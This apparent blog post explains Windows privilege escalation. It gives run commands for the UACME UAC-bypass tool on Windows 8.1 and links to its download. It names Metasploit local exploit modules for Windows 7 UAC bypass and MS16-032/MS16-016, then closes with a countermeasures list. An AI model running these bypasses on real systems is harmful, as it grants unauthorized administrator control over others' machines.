PRIVILEGE ESCALATION

WINDOWS 8.1 PRIVILEGE ESCALATION BY BYPASSING UAC PHYSICALLY




This tool works as you can see in the picture in win 8.1, but it's like one time shot you won't be able to do it again and again. and for this attack you need to have physical access to the target system.

Run examples:
akagi32.exe 1
akagi64.exe 3
akagi32 1 c:\windows\system32\calc.exe
akagi64 3 c:\windows\system32\charmap.exe

Download : https://github.com/hfiref0x/UACME

PRIVILEGE ESCALATION WITH OLD WINDOWS 7 EXPLOITS 

windows/local/bypassuac
windows/local/bypassuac_injection
windows/local/bypassuac_vbs
windows/local/ask
windows/local/ms16_032_secondary_logon_handle_privesc
windows/local/ms16_016_webdav




More Exploits : https://www.exploit-db.com/local/

More Reading :

https://azeria-labs.com/privilege-escalation/

https://blog.netspi.com/windows-privilege-escalation-part-1-local-administrator-privileges/

COUNTERMEASURES

Use PAM
Patch system regularely
Run Services as unprivileged accounts
Restrict access to the system programs
Use restricted groups
Audit windows events
Lock the BIOS
Disable USB ports if possible
Use drive encryption

No comments:

Post a Comment

Popular Posts